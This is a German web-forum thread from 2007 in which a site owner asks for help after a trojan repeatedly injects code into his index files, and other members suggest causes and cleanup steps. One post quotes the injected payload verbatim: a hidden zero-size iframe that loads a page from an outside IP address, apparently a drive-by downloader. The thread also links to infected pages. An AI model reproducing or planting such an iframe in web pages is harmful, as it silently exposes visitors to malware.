Was ist das? Exploit.html

Begonnen von Charan, 29 Juni 2007, 13:47:14

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Charan

Hallo,

habe eben beim Überspielen eines Backups auf meinen Rechner eine Virusmeldung bekommen.

Betroffen sind die index.html in mehreren Ordner.

Hier, kann mal jemand diesen Link aufrufen: http://www.germany-homepages.de/admin/

Kommt doch prompt ne Virusmeldung durch Anti Vir.

Muß ich irgendwas unternehmen oder ist das ungefährlich.

Habe jetzt aber echt bald die Schnauze voll. Vor 6 Wochen Server gehackt, monatelang DDOS Attacken durch Mehmet. Habe jetzt von ungefähr 40 auf 6 Domains reduziert (betraf aber nicht Praxmaxe), das macht irgendwie keinen richtigen Spaß mehr.

Gruß Jochen (ich geh ins Wasser)

SvenW

hi,

hatte ich auch auf einer seite. meines wissens befällt das teil überwiegend html seiten. ich habe damals aber den ganzen space platt gemacht, da ich von haus aus an ... leide. :BD:

hatte gelesen das der trojaner evt. daten sammelt und verschickt, also auch lieber mal das ftp-passwort ändern. man weiss ja nie...

auf deiner startseite germany-homepages ist das teil auch schon vertreten. eine verbreitung über deinen pc via ftp ist hier auch möglich.



gruß

black









Charan

Hallo,

vielen Dank für Deine Antwort.
Wie kommt dieser Mist da rein? Ich habe echt keinen Bock mehr auf die *Sch*.

Habe gerade vor Wochen die Passwörter verändert. Konsequenterweise muß ich dann auch meinen Rechner platt machen, ich plage mich seite Monaten mit diesem Mist rum.

Jochen

m-t

Zitat von: Charan am 29 Juni 2007, 13:47:14
Kommt doch prompt ne Virusmeldung durch Anti Vir.

bitdefender sagt gar nix dazu...

SvenW

#4
Zitat von: Charan am 29 Juni 2007, 13:47:14
Hallo,

vielen Dank für Deine Antwort.
Wie kommt dieser Mist da rein? Ich habe echt keinen Bock mehr auf die *Sch*.

Habe gerade vor Wochen die Passwörter verändert. Konsequenterweise muß ich dann auch meinen Rechner platt machen, ich plage mich seite Monaten mit diesem Mist rum.

Jochen

hallo jochen,

von den teilen gibt es etliche, einige werden auch über mails verbreitet. in meinem fall war es eine joomla installation die ich für jemanden auf einem freehost aktualisieren wollte. da wollte ich auch vorher die daten
per ftp sichern und bekam die meldung von meinem virenscanner. wie nun genau die trojaner in diesem fall eingeschleust wurden weiss ich nicht.


gruss

black

 

Charan

Hallo,

alsom ich habe jetzt einfach die ganzen index Dateien ausgewechselt.
Mal sehen wie lange das hält.

MfG
Jochen

SvenW

hier noch ein aufschlussreicher beitrag in sachen exploit:

http://easysupport.easyforen.de/reply.php?id=4425,4425

@ m-t!  ich denke dass da dein virenscanner nicht gescheit anschlägt, es muss euch auch klar sein, wenn ihr auf solche links hier im forum klickt, dass ihr euch evt. selbst infiziert.

evt. sollten solche links hier vom forum lieber von den admins gelöscht werden.

gruss

black




m-t

Zitat von: black and white am 01 Juli 2007, 11:18:56
es muss euch auch klar sein, wenn ihr auf solche links hier im forum klickt, dass ihr euch evt. selbst infiziert.

is mir klar aber ich hab mir den quelltext vor betreten angeschaut und nix entdeckt also hab ich die seite aufgerufen, vielleicht war es ja schon bereinigt als ich da war ;-)

Charan

Hallo,

also erstmal vielen Dank für Eure Antworten.

Mir macht das im Moment alles keinen Spaß mehr. Was ich mich in den letzten Monaten mit den ganzen Attacken rumgeplagt habe. Letztlich hat auch noch der Rechner nen Schaden gekriegt.

ich muß mal sehen, wie ich jetzt weiter mache.

MfG
Jochen

SvenW

also bei dem ersten link von jochen hab ich diesmal diese meldung von kaspersky: Trojan-Downloader.JS.Agent.ep



Andi

Moin :)

da scheinen etliche php-Dateien mit iframes verseucht worden zu sein.
Sieht aus, wie das gleiche Problem wie hier: http://www.pragmamx.org/Forum-topic-21745.html

Rufe mal die Versionsverwaltung auf, da dürften einige Dateien als verändert gezeigt werden.
Hauptsache ist, das script zu finden, über welches die Dateien verändert werden. Nur die korrupten Dateien austauschen bringt nicht viel.
schön´s Grüssle, Andi

Charan

#11
Hallo,

habe z.B. in der index.php den Eintrag anhängen:

<iframe src='http://81.95.145.240/logo/index.php'; style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Das ist die Scheiße.
Aber wie finde ich das Script. Habe Passwörter alle verändert.

MfG
Jochen

StegRene

DA weisst zumindest schon mal, wo der Server steht und auf wen der läuft.
Obs was hilft? Aber ich würd mal hinschreiben,...........

Charan

Hallo,

bringt garnichts. Habe gerade vorhin etwas über die adresse gelesen.

Ich habe, das nur nebenbei mal, vor 4 Monaten bei der Polizei eine Anzeige gemacht, weil ungefähr 20 Domains über Nacht bei mir geknackt worden sind. Hatte Logfiles und konnte alles belegen. Das kam über nen Server von 1und1.

Habe bis heute nichts gehört, von 1und1 sowieso nichts.

MfG
Jochen

Charan

Hallo,

also ich fasse es nicht. Gestern die Passwörter komplett verändert und heute schon wieder überall die Einträge in den index.html Dateien. Und zwar auf jedem FTP-Server.

Die gehn bei mir rein und raus wie sie Lust haben.

Was kann ich denn jetzt noch machen? Da muß doch jemand die eingabe von Passwörtern mitlesen und das kann doch nur von meinem Rechner ausgehen.
Oder kann ein Server so gehackt sein, das auch ein Provider es nicht sieht?

Mfg
Jochen

JoergK

@Charan

Haste Dir mal den Beitrag von Andi aus seinem Link in Antwort 10 angesehen?
Da schreibt er doch
Zitat von: Andi am 06 Juni 2007, 11:52:55
Hast du Zugriff auf die Serverlogfiles aus diesem Zeitraum?
Irgendwelche Fremdmodule installiert, oder andere Scripte auf dem Server?

Wir hatten vor ner Weile das gleiche Problem, da lag es an einer Sicherheitslücke am FTP-Server. Also auch mal unbedingt beim Provider nachfragen...

Solltest Du allerding einen dedizierten Rootserver gemieten haben, so wirste Dich selbst mit den Serverlogs und eventuellen Updates der auf dem Server laufenden Programmen beschäftigen müssen - oder beauftragst den Fachmann Deines Vertrauens damit.  ;)
Gruß,
Jörg


Nobody is perfect ... so don't call me Nobody